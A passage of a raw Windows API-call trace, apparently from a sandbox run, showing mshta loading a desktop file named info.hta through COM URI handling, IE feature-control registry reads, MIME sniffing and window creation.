IUnknown:Release (This=0x49c07c) returned 0x3 [0223.736] IUnknown:AddRef (This=0x49c07c) returned 0x4 [0223.736] IUri:GetPropertyDWORD (in: This=0x49c07c, uriProp=0x11, pdwProperty=0x41f3d4, dwFlags=0x0 | out: pdwProperty=0x41f3d4*=0x9) returned 0x0 [0223.736] IUnknown:Release (This=0x49c07c) returned 0x3 [0223.736] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x76) returned 0x481fe8 [0223.736] IInternetSecurityManager:GetSecurityId (in: This=0x4a38e8, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f430, pcbSecurityId=0x41f42c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f430*=0x66, pcbSecurityId=0x41f42c*=0x9) returned 0x0 [0223.736] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f430, pcbSecurityId=0x41f42c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f430*=0x0, pcbSecurityId=0x41f42c*=0x200) returned 0x800c0011 [0223.737] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x481fe8 | out: hHeap=0x470000) returned 1 [0223.737] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.737] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9) returned 0x4af360 [0223.737] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x41f654, dwReserved=0x0 | out: ppIInternetSession=0x41f654*=0x4a3d90) returned 0x0 [0223.737] IInternetSession:RegisterNameSpace (This=0x4a3d90, pCF=0x74478c50, rclsid=0x74079790, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0223.737] IUnknown:AddRef (This=0x74478c50) returned 0x1 [0223.737] IInternetSession:RegisterNameSpace (This=0x4a3d90, pCF=0x74478c70, rclsid=0x74079780, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0223.737] IUnknown:AddRef (This=0x74478c70) returned 0x1 [0223.737] StrCmpICW (pszStr1="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pszStr2="res://ieframe.dll/PhishSite.htm") returned -12 [0223.737] IUnknown:QueryInterface (in: This=0x49bd1c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f5c4 | out: ppvObject=0x41f5c4*=0x49bd1c) returned 0x0 [0223.738] IUnknown:Release (This=0x49bd1c) returned 0x9 [0223.738] IUnknown:AddRef (This=0x49bd1c) returned 0xa [0223.738] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12c) returned 0x4b1908 [0223.738] IUnknown:AddRef (This=0x49bd1c) returned 0xb [0223.738] IUnknown:QueryInterface (in: This=0x49bd1c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f588 | out: ppvObject=0x41f588*=0x49bd1c) returned 0x0 [0223.738] IUnknown:Release (This=0x49bd1c) returned 0xb [0223.738] IUnknown:AddRef (This=0x49bd1c) returned 0xc [0223.738] IUnknown:Release (This=0x49bd1c) returned 0xb [0223.738] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3c) returned 0x484190 [0223.740] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb4) returned 0x4b1a40 [0223.741] IUri:GetScheme (in: This=0x49bd1c, pdwScheme=0x41f60c | out: pdwScheme=0x41f60c*=0x9) returned 0x0 [0223.741] IUri:IsEqual (in: This=0x49c07c, pUri=0x49bd1c, pfEqual=0x41f654 | out: pfEqual=0x41f654*=1) returned 0x0 [0223.741] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4ae220 [0223.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x12) returned 0x493748 [0223.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x60) returned 0x4b1b00 [0223.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x30) returned 0x48d850 [0223.741] PostMessageW (hWnd=0x20166, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0223.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12c) returned 0x4b1b68 [0223.741] IUnknown:AddRef (This=0x49bd1c) returned 0xc [0223.741] IUnknown:QueryInterface (in: This=0x49bd1c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f5a8 | out: ppvObject=0x41f5a8*=0x49bd1c) returned 0x0 [0223.741] IUnknown:Release (This=0x49bd1c) returned 0xc [0223.741] IUnknown:AddRef (This=0x49bd1c) returned 0xd [0223.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4ae278 [0223.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x68) returned 0x4b1ca0 [0223.742] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x108) returned 0x4b1d10 [0223.742] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4af3a8 [0223.742] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xcc) returned 0x49c730 [0223.742] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4af3f0 [0223.742] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x30) returned 0x48d888 [0223.742] IUnknown:QueryInterface (in: This=0x49bd1c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f2ac | out: ppvObject=0x41f2ac*=0x49bd1c) returned 0x0 [0223.742] IUnknown:Release (This=0x49bd1c) returned 0xd [0223.742] IUnknown:AddRef (This=0x49bd1c) returned 0xe [0223.742] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.742] IUnknown:AddRef (This=0x49bd1c) returned 0xf [0223.742] IUnknown:AddRef (This=0x49bd1c) returned 0x10 [0223.742] IUnknown:QueryInterface (in: This=0x49bd1c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f2a0 | out: ppvObject=0x41f2a0*=0x49bd1c) returned 0x0 [0223.742] IUnknown:Release (This=0x49bd1c) returned 0x10 [0223.742] IUnknown:AddRef (This=0x49bd1c) returned 0x11 [0223.742] IUri:GetScheme (in: This=0x49bd1c, pdwScheme=0x4b1f28 | out: pdwScheme=0x4b1f28*=0x9) returned 0x0 [0223.742] IMoniker:IsSystemMoniker (in: This=0x4805d8, pdwMksys=0x41f308 | out: pdwMksys=0x41f308*=0x6) returned 0x0 [0223.742] CoInternetParseIUri (in: pIUri=0x49bd1c, ParseAction=0x9, dwFlags=0x0, pwzResult=0x41f318, cchResult=0x104, pcchResult=0x41f2bc, dwReserved=0x0 | out: pwzResult="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta", pcchResult=0x41f2bc) returned 0x0 [0223.742] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x62) returned 0x4b1fd8 [0223.742] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta", lpFindFileData=0x41f048 | out: lpFindFileData=0x41f048) returned 0x4af500 [0223.742] FindClose (in: hFindFile=0x4af500 | out: hFindFile=0x4af500) returned 1 [0223.743] IUnknown:QueryInterface (in: This=0x49bd1c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f2ac | out: ppvObject=0x41f2ac*=0x49bd1c) returned 0x0 [0223.743] IUnknown:Release (This=0x49bd1c) returned 0x11 [0223.743] IUnknown:AddRef (This=0x49bd1c) returned 0x12 [0223.790] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x10) returned 0x4af3d8 [0223.790] IInternetSession:CreateBinding (in: This=0x4a3d90, pbc=0x0, szUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x4af3e0, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0x4af3e0*=0x4b2508) returned 0x0 [0223.791] IUnknown:QueryInterface (in: This=0x4b2508, riid=0x74096078*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x41f230 | out: ppvObject=0x41f230*=0x0) returned 0x80004002 [0223.791] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f1cc | out: phkResult=0x41f1cc*=0x1b4) returned 0x0 [0223.791] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f1d0 | out: phkResult=0x41f1d0*=0x1bc) returned 0x0 [0223.791] RegOpenKeyExW (in: hKey=0x1bc, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x41f18c | out: phkResult=0x41f18c*=0x0) returned 0x2 [0223.791] RegOpenKeyExW (in: hKey=0x1b4, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x41f18c | out: phkResult=0x41f18c*=0x1c0) returned 0x0 [0223.791] SHRegGetValueW () returned 0x2 [0223.791] SHRegGetValueW () returned 0x2 [0223.791] RegCloseKey (hKey=0x1c0) returned 0x0 [0223.791] RegCloseKey (hKey=0x0) returned 0x6 [0223.791] RegCloseKey (hKey=0x0) returned 0x6 [0223.791] RegCloseKey (hKey=0x1b4) returned 0x0 [0223.791] RegCloseKey (hKey=0x1bc) returned 0x0 [0223.791] IUnknown:AddRef (This=0x4b2508) returned 0x2 [0223.791] IUnknown:QueryInterface (in: This=0x4b2508, riid=0x74096158*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x41f274 | out: ppvObject=0x41f274*=0x4b2508) returned 0x0 [0223.791] IInternetProtocolEx:StartEx (This=0x4b2508, pUri=0x49bd1c, pOIProtSink=0x4b1e74, pOIBindInfo=0x4b1e3c, grfPI=0x10, dwReserved=0x0) returned 0x0 [0223.791] IUnknown:AddRef (This=0x4b1e74) returned 0x3 [0223.791] IUnknown:AddRef (This=0x4b1e3c) returned 0x4 [0223.791] IUnknown:QueryInterface (in: This=0x4b1e3c, riid=0x75326f40*(Data1=0xa3e015b7, Data2=0xa82c, Data3=0x4dcd, Data4=([0]=0xa1, [1]=0x50, [2]=0x56, [3]=0x9a, [4]=0xee, [5]=0xed, [6]=0x36, [7]=0xab)), ppvObject=0x41f21c | out: ppvObject=0x41f21c*=0x0) returned 0x80004002 [0223.792] IInternetBindInfo:GetBindInfo (in: This=0x4b1e3c, grfBINDF=0x4b2678, pbindinfo=0x4b2680 | out: grfBINDF=0x4b2678*=0x20083, pbindinfo=0x4b2680) returned 0x0 [0223.792] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f178 | out: phkResult=0x41f178*=0x1bc) returned 0x0 [0223.792] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f17c | out: phkResult=0x41f17c*=0x1b4) returned 0x0 [0223.792] RegOpenKeyExW (in: hKey=0x1b4, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x41f138 | out: phkResult=0x41f138*=0x0) returned 0x2 [0223.792] RegOpenKeyExW (in: hKey=0x1bc, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x41f138 | out: phkResult=0x41f138*=0x0) returned 0x2 [0223.792] RegCloseKey (hKey=0x0) returned 0x6 [0223.792] RegCloseKey (hKey=0x0) returned 0x6 [0223.792] RegCloseKey (hKey=0x1bc) returned 0x0 [0223.792] RegCloseKey (hKey=0x1b4) returned 0x0 [0223.792] IUnknown:AddRef (This=0x4b1e74) returned 0x5 [0223.834] IInternetProtocolSink:ReportProgress (This=0x4b1e74, ulStatusCode=0xb, szStatusText="") returned 0x0 [0223.834] IInternetProtocolSink:ReportProgress (This=0x4b1e74, ulStatusCode=0xe, szStatusText="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta") returned 0x0 [0223.834] GetCurrentProcessId () returned 0x380 [0223.835] IInternetProtocolSink:ReportProgress (This=0x4b1e74, ulStatusCode=0xd, szStatusText="application/hta") returned 0x0 [0223.835] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc11f [0223.835] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc120 [0223.835] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc150 [0223.835] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc12b [0223.835] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc12d [0223.835] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc12c [0223.835] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc131 [0223.835] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc132 [0223.835] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc133 [0223.835] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc135 [0223.835] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc134 [0223.835] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc137 [0223.835] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc138 [0223.835] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc139 [0223.835] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc151 [0223.835] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc152 [0223.835] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc12f [0223.835] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc130 [0223.835] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc136 [0223.835] StrCmpICW (pszStr1="application/hta", pszStr2="text/xml") returned -19 [0223.835] StrCmpNICW (lpStr1="applicat", lpStr2="text/css", nChar=8) returned -19 [0223.835] IInternetProtocolSink:ReportData (This=0x4b1e74, grfBSCF=0x5, ulProgress=0x200a, ulProgressMax=0x200a) returned 0x0 [0223.835] IUnknown:QueryInterface (in: This=0x4b2508, riid=0x740b9460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x41d744 | out: ppvObject=0x41d744*=0x0) returned 0x80004002 [0223.835] IUnknown:QueryInterface (in: This=0x4b2508, riid=0x74034588*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x41d73c | out: ppvObject=0x41d73c*=0x0) returned 0x80004002 [0223.836] IInternetProtocolSink:ReportResult (This=0x4b1e74, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0 [0223.836] IUnknown:Release (This=0x4b2508) returned 0x2 [0223.836] IUnknown:Release (This=0x49bd1c) returned 0x13 [0223.836] IUnknown:Release (This=0x49bd1c) returned 0x12 [0223.836] IUnknown:Release (This=0x49bd1c) returned 0x11 [0223.836] CoTaskMemFree (pv=0x0) [0223.836] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1a8) returned 0x4b2048 [0223.836] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x41f560 | out: lpCPInfo=0x41f560) returned 1 [0223.836] IUnknown:AddRef (This=0x4a3d90) returned 0x3 [0223.836] IUnknown:AddRef (This=0x49bd1c) returned 0x12 [0223.836] IUnknown:QueryInterface (in: This=0x49bd1c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f568 | out: ppvObject=0x41f568*=0x49bd1c) returned 0x0 [0223.837] IUnknown:Release (This=0x49bd1c) returned 0x12 [0223.837] IUnknown:AddRef (This=0x49bd1c) returned 0x13 [0223.837] IUri:GetScheme (in: This=0x49bd1c, pdwScheme=0x41f56c | out: pdwScheme=0x41f56c*=0x9) returned 0x0 [0223.837] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7406e718, lpParameter=0x4b21f8, dwCreationFlags=0x0, lpThreadId=0x4b220c | out: lpThreadId=0x4b220c*=0x330) returned 0x17c [0223.838] GetCurrentThreadId () returned 0x390 [0223.838] GetCurrentThreadId () returned 0x390 [0223.838] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x72) returned 0x4820e8 [0223.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.838] MulDiv (nNumber=8202, nNumerator=4000, nDenominator=8202) returned 4000 [0223.838] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x76) returned 0x482168 [0223.838] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x128) returned 0x4b3008 [0223.838] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49dfa8 [0223.838] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x62) returned 0x4b3138 [0223.838] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100) returned 0x4b31a8 [0223.838] IInternetProtocol:Read (in: This=0x4b2508, pv=0x4b31b4, cb=0xc8, pcbRead=0x41f4b0 | out: pv=0x4b31b4, pcbRead=0x41f4b0*=0xc8) returned 0x0 [0223.839] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pSecMgr=0x0) returned 0x1 [0223.839] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f438 | out: phkResult=0x41f438*=0x190) returned 0x0 [0223.839] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f43c | out: phkResult=0x41f43c*=0x1c8) returned 0x0 [0223.839] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x41f3f8 | out: phkResult=0x41f3f8*=0x0) returned 0x2 [0223.839] RegOpenKeyExW (in: hKey=0x190, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x41f3f8 | out: phkResult=0x41f3f8*=0x0) returned 0x2 [0223.839] RegCloseKey (hKey=0x0) returned 0x6 [0223.839] RegCloseKey (hKey=0x0) returned 0x6 [0223.840] RegCloseKey (hKey=0x190) returned 0x0 [0223.840] RegCloseKey (hKey=0x1c8) returned 0x0 [0223.840] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta", pBuffer=0x41f4d8, cbSize=0xc8, pwzMimeProposed="text/html", dwMimeFlags=0x6, ppwzMimeOut=0x41f490, dwReserved=0x0 | out: ppwzMimeOut=0x41f490*="text/html") returned 0x0 [0223.841] CoTaskMemFree (pv=0x4b32c8) [0223.841] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pSecMgr=0x0) returned 0x1 [0223.841] StrCmpNIW (lpStr1="text/h", lpStr2="image/", nChar=6) returned 1 [0223.841] GetCurrentThreadId () returned 0x390 [0223.841] SetEvent (hEvent=0x1b4) returned 1 [0223.841] IUnknown:Release (This=0x49bd1c) returned 0x12 [0223.841] IUnknown:Release (This=0x49c22c) returned 0x1 [0223.841] IUnknown:Release (This=0x4805d8) returned 0x3 [0223.841] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.841] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.841] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.841] IUnknown:Release (This=0x49bd1c) returned 0x11 [0223.841] IUnknown:Release (This=0x49bd1c) returned 0x10 [0223.841] IUnknown:Release (This=0x49bd1c) returned 0xf [0223.841] IUnknown:Release (This=0x4805d8) returned 0x2 [0223.841] IUnknown:Release (This=0x49bd1c) returned 0xe [0223.841] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.842] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.842] CoTaskMemFree (pv=0x481a68) [0223.842] CoTaskMemFree (pv=0x0) [0223.842] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.842] IUnknown:Release (This=0x49bd1c) returned 0xd [0223.842] CoTaskMemFree (pv=0x4819e8) [0223.842] GetClientRect (in: hWnd=0x20156, lpRect=0x41fa84 | out: lpRect=0x41fa84) returned 1 [0223.842] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x78) returned 0x4819e8 [0223.842] GetClientRect (in: hWnd=0x20156, lpRect=0x481a14 | out: lpRect=0x481a14) returned 1 [0223.842] OffsetRect (in: lprc=0x481a14, dx=0, dy=0 | out: lprc=0x481a14) returned 1 [0223.842] OffsetRect (in: lprc=0x481a24, dx=0, dy=0 | out: lprc=0x481a24) returned 1 [0223.842] RegisterClassExW (param_1=0x41f5a0) returned 0xc153 [0223.842] CoCreateInstance (in: rclsid=0x7408bf70*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x7408bf60*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x7447b020 | out: ppv=0x7447b020*=0x4a4cd0) returned 0x0 [0224.436] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x4a4cd0, aaClassList=0x41f698*=0xc153, uSize=0x1) returned 0x0 [0224.437] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc153, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x20156, hMenu=0x0, hInstance=0x73f40000, lpParam=0x4a1938) returned 0x30198 [0224.437] GetWindowLongW (hWnd=0x30198, nIndex=-20) returned 0 [0224.437] SetWindowLongW (hWnd=0x30198, nIndex=-21, dwNewLong=4856120) returned 0 [0224.437] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4a4cd0, hWnd=0x30198, msg=0x81, wParam=0x0, lParam=0x41f26c*=4856120, plResult=0x41f0e4 | out: plResult=0x41f0e4) returned 0x1 [0224.437] NtdllDefWindowProc_W () returned 0x1 [0224.437] GetCurrentThreadId () returned 0x390 [0224.437] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0224.437] GetCurrentThreadId () returned 0x390 [0224.437] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0224.437] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4a4cd0, hWnd=0x30198, msg=0x1, wParam=0x0, lParam=0x41f26c*=4856120, plResult=0x41f0e4 | out: plResult=0x41f0e4) returned 0x1 [0224.437] NtdllDefWindowProc_W () returned 0x0 [0224.437] GetCurrentThreadId () returned 0x390 [0224.437] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0224.437] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4a4cd0, hWnd=0x30198, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x41f130 | out: plResult=0x41f130) returned 0x1 [0224.437] NtdllDefWindowProc_W () returned 0x0 [0224.437] GetCurrentThreadId () returned 0x390 [0224.437] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0224.437] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4a4cd0, hWnd=0x30198, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x41f130 | out: plResult=0x41f130) returned 0x1 [0224.437] NtdllDefWindowProc_W () returned 0x0 [0224.437] GetCurrentThreadId () returned 0x390 [0224.437] NtdllDefWindowProc_W () returned 0x0 [0224.437] GetClassNameW (in: hWnd=0x20156, lpClassName=0x41f6a0, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34 [0224.438] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1 [0224.438] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x4a4cd0, fRestoreLayout=1) returned 0x0 [0224.438] SendMessageW (hWnd=0x30198, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0224.438] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0224.438] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4a4cd0, hWnd=0x30198, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x41f554 | out: plResult=0x41f554) returned 0x1 [0224.438] NtdllDefWindowProc_W () returned 0x3 [0224.438] GetCurrentThreadId () returned 0x390 [0224.438] IntersectRect (in: lprcDst=0x41f8d4, lprcSrc1=0x481a14, lprcSrc2=0x481a24 | out: lprcDst=0x41f8d4) returned 1 [0224.438] EqualRect (lprc1=0x41f8d4, lprc2=0x481a14) returned 1 [0224.438] InvalidateRect (hWnd=0x30198, lpRect=0x0, bErase=1) returned 1 [0224.438] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xf0) returned 0x4b3bb0 [0224.438] IntersectRect (in: lprcDst=0x41f7c0, lprcSrc1=0x41f7c0, lprcSrc2=0x41f758 | out: lprcDst=0x41f7c0) returned 1 [0224.438] IntersectRect (in: lprcDst=0x41f7c0, lprcSrc1=0x41f7c0, lprcSrc2=0x41f758 | out: lprcDst=0x41f7c0) returned 1 [0224.438] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x60) returned 0x4b3ca8 [0224.438] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x30) returned 0x48d930 [0224.508] IntersectRect (in: lprcDst=0x41f5fc, lprcSrc1=0x41f5fc, lprcSrc2=0x41f5cc | out: lprcDst=0x41f5fc) returned 1 [0224.508] IntersectRect (in: lprcDst=0x4b42d8, lprcSrc1=0x4b42d8, lprcSrc2=0x41f5ec | out: lprcDst=0x4b42d8) returned 1 [0224.508] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0224.508] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x28) returned 0x4b0f70 [0224.508] HeapFree (in: hHeap=0x470000, dwFlags=0x0, 